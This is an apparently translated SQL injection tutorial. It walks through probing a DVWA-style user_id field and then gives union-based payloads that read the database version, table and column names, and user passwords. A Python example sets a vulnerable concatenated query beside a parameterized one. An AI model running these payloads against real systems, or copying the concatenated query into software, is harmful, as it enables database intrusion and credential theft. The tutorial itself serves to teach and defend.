Detailed SQL injection
The concept of SQL injection
SQL injection means that an attacker breaks the intended structure of an SQL query by supplying input containing SQL fragments that the application splices into the query string, so that the database ends up executing SQL of the attacker's choosing.
Character injection
Background statement template
SELECT first_name, last_name FROM users WHERE user_id ='$id';
normal access
SELECT first_name, last_name FROM users WHERE user_id = '1';
construct SQL injection statement
SELECT first_name, last_name FROM users WHERE user_id = '1' union select 1,2#';
- Determine whether there is an injection point
  - Enter 1 first: the page is normal
  - Enter 1': the page is abnormal
  - Conclusion: there may be an injection point
- Determine the type of injection point
  - 1 and 1=1: returns normally
  - 1 and 1=2: returns normally
  - 1' and 1=1#: returns normally
  - 1' and 1=2#: no return
  - Combining the above four tests: the unquoted inputs behave identically because the whole input is treated as one string value, while the quoted inputs change the result, so this injection point is character injection
- Determine how many columns the query returns
  - 1' order by n# (n is the number being tested)
  - 1' order by 3#: the page reports an error, indicating that the number of columns is less than 3
  - 1' order by 2#: the page is normal, indicating that the query returns 2 columns
- Query the current database name and version number
  - 1' union select version(),database()#
- Get the table names in the database
  - 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
- Get the field names in a table, using the users table as an example
  - 1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
- Get the data in the fields
  - 1' union select user,password from users#
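The contrast the steps above rest on, as an added example that is not part of the original page: the template with $id spliced into the query string beside the same query with a bound parameter, run against a constructed in-memory SQLite table standing in for the MySQL backend. SQLite has no MySQL `#` comment, so the payload closes the template's trailing quote with a comparison instead of commenting it out; the table layout and sample rows are assumptions.

```python
import sqlite3

# Constructed sample data; the table shape follows the page's users table
# (first_name, last_name plus the user and password columns the last payload reads).
SAMPLE_USERS = [
    (1, "Alice", "Admin", "admin", "PLACEHOLDER-HASH-1"),
    (2, "Bob", "Builder", "bob", "PLACEHOLDER-HASH-2"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL backend in the page's example."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT,"
        " user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_lookup(conn, user_id):
    """The page's template with $id pasted into the string: the input becomes SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user_id):
    """Same query with a bound parameter: the input is only ever a value."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


# Character-injection payload in the page's style; the closing '1'='1 takes the
# place of MySQL's trailing # comment so the template's final quote still pairs up.
UNION_PAYLOAD = "1' union select user, password from users where '1'='1"


def probe_breaks_query(conn):
    """The page's first test: a lone quote turns the concatenated query into a syntax error."""
    try:
        vulnerable_lookup(conn, "1'")
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    conn = make_db()
    return {
        "normal": vulnerable_lookup(conn, "1"),
        "injected": vulnerable_lookup(conn, UNION_PAYLOAD),  # user/password rows leak
        "parameterized": safe_lookup(conn, UNION_PAYLOAD),   # payload matches no user_id
        "normal_parameterized": safe_lookup(conn, "1"),
    }
```

With parameter binding the whole payload is compared against user_id as a single value, which is why the same input that extracts every credential from the concatenated query returns an empty result from the bound one.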